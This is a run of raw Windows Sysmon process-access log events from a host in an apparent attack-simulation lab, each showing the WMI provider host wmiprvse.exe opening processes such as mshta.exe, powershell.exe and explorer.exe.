15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5355-6008-3506-00000000A301}6812C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023444Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023443Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023442Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023441Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023440Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023439Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023438Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023437Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023436Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023435Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023434Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023433Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023432Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023431Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.273{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023430Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023429Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023428Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023427Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023426Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023425Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 